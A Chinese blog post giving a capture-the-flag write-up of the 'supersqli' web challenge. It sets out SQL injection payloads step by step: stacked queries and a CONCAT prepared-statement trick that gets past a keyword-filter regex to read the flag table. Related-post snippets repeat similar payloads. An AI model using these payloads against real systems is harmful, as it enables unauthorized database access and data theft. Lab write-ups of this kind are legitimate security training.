攻防世界web高手区supersqli解法(详细)

已于 2022-06-01 22:48:05 修改
阅读量1.7k 收藏 24
点赞数 7
文章标签: sql 数据库 database
于 2022-05-25 01:18:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53105813/article/details/124957962
版权

supersqli   翻译一下为超级数据库

打开题目很明显,直接想到sql注入

验证一下猜想

提交 1’ and 1=1#和1‘ and 1=2#(输入框中没有显示在url中)

说明存在注入漏洞

接下来用order by判断字段 提交

1'order by 2#

提交

1'order by 3#

说明只有两个字段爆出

接下来尝试爆数据库名

提交:

1'union select  1,database()#

返回错误信息

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

 这是一个字符串匹配函数说明过滤了括号中的关键字,包括我们要用的selecte,我试了一下大写也不行,只能换方法了

试试使用堆叠注入show方法

提交

1'; show databases; # 

 成功发现数据库supersqli,接下来查看表名

提交

 1';use supersqli;show tables;#

 有俩表,先打开看看有什么字段

提交(纯数字为表名要打引号)

 1';use  supersqli; show columns from `1919810931114514`;#  

发现flag了哈哈哈哈,

接下来可以用预编译

(放个链接,不懂的可以去看一下) 

设置参数

set @sql = CONCAT('se','lect * from `1919810931114514`;');

执行预编译SQL语句

prepare stmt from @sql;

EXECUTE stmt;

合起来为

1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#

 好像set 也被过滤了

换个大写

1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#

成功拿到flag 

flag{c168d583ed0d4d7196967b28cbd0b5e9}

恭喜你!!

 

 

 

 

 


                

        

        

    




    

      

        

            

              
                
                  Dalean.
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    7
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    24
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
攻防世界】五 --- supersqli

				
			

			

				

					qq_43168364的博客
				

				

					12-23
					
					404
					
				

			

		

		

			
				
题目 — supersqli
一、writeup
二、知识点



			
		

	



                

              
                



	

		

			

				
					
国信安web安全——SQLi-Labs第1-8关

				
			

			

				

					学习记录
				

				

					02-28
					
					370
					
				

			

		

		

			
				
一、第一关
1)判断是否动态网站
2)找到注入点,猜测后台查询语句,select * from t_xx where uid=‘1’,在url地址栏更改id=后面字符,判断后台查询语句中接收的传入的参数的类型为数字型


3)判断闭合符,逐一尝试或者通过报错信息迅速判断

4)根据上一步找到的闭合符号将语句闭合,并且将位于查询语句后方的多余语句使用注释符–+注释掉,防止其干扰注入查询。
5)通过SQL语句查询数据库名、表名、列名等



第二到第四关思路相同,就不赘述。
二、第五关
第五关有两种解决办法,布

			
		

	



                


  
              

                


	

		

			

				
					
攻防世界靶场(web-supersqli)--堆叠注入、二次注入

				
			

			

				

					DMXA的博客
				

				

					09-21
					
					266
					
				

			

		

		

			
				
这段代码是使用 PHP 语言编写的一个正则表达式,用于检测变量 $inject 中是否包含一些常见的 SQL 注入攻击关键字。具体来说,它通过 preg_match() 函数匹配字符串 $inject 中是否存在以下关键字(不分大小写):select: 查询关键字。update: 更新关键字。delete: 删除关键字。drop: 删除表关键字。insert: 插入关键字。where: 查询条件关键字。.: 正则表达式中的特殊字符,可能被用于注入攻击。

			
		

	





	

		

			

				
					
supersqli

				
			

			

				

					陈艺秋的博客
				

				

					07-24
					
					336
					
				

			

		

		

			
				
查询数据库,发现正则过滤,并且不分大小写,尝试过/**/注释符对select分隔,但是识别不了,哪还有一种方法就是堆叠注入。查表,只包含两个表,但是select被过滤掉了,所以我们可以使用show columns来查看表中字段。这个时候就要发散一下思维,可以看到之间传参1所回显的数据,和words表字段的结构其实是差不多的。这里就是默认将接受到的参数传递给words表的id字段,然后回显id字段对应的字符串数据。尽量一次性做完哦,不然有可能变成以下这样,其实变成这样,也可以验证咱的思路。

			
		

	



		

			
		



	

		

			

				
					
攻防世界(CTF)~web-supersqli详细解题思路)

					
最新发布

				
			

			

				

					m0_75030189的博客
				

				

					05-10
					
					879
					
				

			

		

		

			
				
mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,会一起执行。这就是堆叠注入的基本原理

			
		

	





	

		

			

				
					
攻防世界 supersqli(堆叠注入)

				
			

			

				

					m0_56107268的博客
				

				

					05-04
					
					1804
					
				

			

		

		

			
				
1.首先判断有无注入点:

1’ and 1=1 #



1' and 1=2 #



2.进行注入

判断字段数

1' order by 2 # //两个字段

判断字段注入点

1' union select 1,2 #



出现一个正则替换

查看其他人博客,发现是使用堆叠注入

堆叠注入原理?


mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔
开,而堆叠注入其实就是通过结束符来执行多条sql语句


堆叠注入触发条件


堆叠注入触发的条件很

			
		

	





	

		

			

				
					
攻防世界supersqli

				
			

			

				

					zara_anna的博客
				

				

					07-27
					
					175
					
				

			

		

		

			
				
假设注入类型为数字型,注入点为id,分别输入上面的语句,那么第一行测试语句会返回id为1的查询结果,而第二行语句由于条件and 1=2不成立,所以查询结果为空。如果注入类型为字符型,将上面语句拼接到sql中,由于id的值都不匹配,所以应该是都不返回任何结果,但是如果id本身是int类型,实际查询过程中是会返回结果的,这可能是因为对输入的字符进行了截断并转换了类型,造成1 and 1=2在字符类型中会返回id为1的查询结果。

			
		

	





	

		

			

				
					
攻防世界-supersqli(堆叠注入)

				
			

			

				

					m0_62094846的博客
				

				

					12-23
					
					2157
					
				

			

		

		

			
				
输入1正常显示,输入1‘报错,可以判定是注入



输入2可以,3不行,可以知道有2个字段

然后判定回显位


1' union select 1,2#



过滤了挺多东西的,双写select也无法绕过

看了wp,是堆叠注入

查找数据库


?inject=1';show databases;--+

查看表


-1';show tables;--+



查看words表


-1';desc words;--+



查看1919810931114514表


-1'...

			
		

	





	

		

			

				
					
攻防世界    supersqli  writeup

				
			

			

				

					12-14
				

			

		

		

			
				
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目  order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...

			
		

	





	

		

			

				
					
攻防世界Wire1杂项

				
			

			

				

					11-20
				

			

		

		

			
				
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997

			
		

	





	

		

			

				
					
攻防世界流量分析2杂项

				
			

			

				

					11-20
				

			

		

		

			
				
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659

			
		

	





	

		

			

				
					
SuperSQL注入.rar

				
			

			

				

					07-21
				

			

		

		

			
				
一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。
目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。
1.支持任意地点出现的任意SQL注入
2.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。
3.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。
4.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。

			
		

	





	

		

			

				
					
AI与大数据应用(下)SuperSQL:数据湖时代的高性能SQL引擎.pdf

				
			

			

				

					09-07
				

			

		

		

			
				
AI与大数据应用(下)SuperSQL:数据湖时代的高性能SQL引擎

			
		

	





	

		

			

				
					
攻防世界杂项m0-01

				
			

			

				

					11-13
				

			

		

		

			
				
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871

			
		

	





	

		

			

				
					
攻防世界杂项津门杯2021-m1

				
			

			

				

					11-14
				

			

		

		

			
				
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757

			
		

	





	

		

			

				
					
攻防世界——supersqli进阶

				
			

			

				

					qq_62046696的博客
				

				

					05-04
					
					1537
					
				

			

		

		

			
				
关于sqil的题目,这个真的是知识面太杂了。我研究了好几天,才看懂了这个题解。

打开场景以后,发现的是一个文本框,然后试一下有没有sql注入

先输入1发现回显正常,然后输入1‘发现出现错误,然后就可以判断存在sql注入

然后判断一下有几列,进行 1' order by 2#回显正常,但是1' order by 3#回显错误,所以可以确定一共有2列

发现select被禁用

然后就想到运用推叠注入,

想到首先查询一下数据库,然后发现supersqli这个就是要找的数据库

然后进行查表操作,

..

			
		

	





	

		

			

				
					
关于sql 注入 (php)

				
			

			

				

					lianxiangbus
				

				

					07-31
					
					123
					
				

			

		

		

			
				
昨天看了些有关sql注入的的知识,没想到sql学的好的话可以如此强大,\(^o^)/~,小哥的sql只是皮毛啊,那就只防不攻吧……这些知识全都是网络上搜刮得来的,前人总结非个人的,我把主要的都贴进来供以后学习


PHP注入的基本原理
程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对
用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据
库...

			
		

	





	

		

			

				
					
【XCTF 攻防世界WEB 高手进阶 supersqli(三种方法)

				
			

			

				

					weixin_45844670的博客
				

				

					08-27
					
					647
					
				

			

		

		

			
				
这道题有多种方法方法一(堆叠注入+rename&alter)方法二(handler)方法三(预编译)
方法一(堆叠注入+rename&alter)
就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这个时候我们使用增删查改毫无限制。
相关知识补充:
https://www.jianshu.com/p/c50ced83414d
https://blog.cs

			
		

	





	

		

			

				
					
BUUCTF:[GYCTF2020]Blacklist

				
			

			

				

					末初的CSDN博客
				

				

					11-09
					
					437
					
				

			

		

		

			
				
https://buuoj.cn/challenges#[GYCTF2020]Blacklist


和强网杯那道随便注一样,只不过过滤更多了

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

?inject=1';show databases--+


?inject=-1';show tables;--+


?inject=-1';show colu

			
		

	





	

		

			

				
					
攻防世界supersqli

				
			

			

				

					08-09
				

			

		

		

			
				
Supersqli是一种强大的SQL注入攻击技术,它可以绕过应用程序的安全机制并获取未经授权的访问权限。攻击者可以通过在应用程序的输入字段中插入恶意的SQL代码,来执行未经授权的数据库操作。

为了防御Supersqli攻击,开发人员可以采取以下措施:

1. 输入验证和过滤:对于所有用户输入的数据,进行严格的验证和过滤,确保只接受预期的数据类型和格式。

2. 使用参数化查询:使用参数化查询或预编译语句,而不是直接拼接用户输入的数据到SQL语句中。这样可以防止SQL注入攻击成功。

3. 最小权限原则:数据库用户应该具有最低权限来执行操作,以限制攻击者在成功注入后能够执行的操作范围。

4. 错误消息处理:不要向用户显示详细的错误消息,因为攻击者可能会利用这些错误消息来获取有关数据库结构和查询的信息。

5. 定期更新和漏洞扫描:及时更新应用程序和数据库,以确保已修复已知的漏洞,并对应用程序进行定期的漏洞扫描。

这些是一些常见的防御措施,但是请注意,没有绝对安全的系统,因此需要综合考虑多个安全层面来保护应用程序和数据库。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值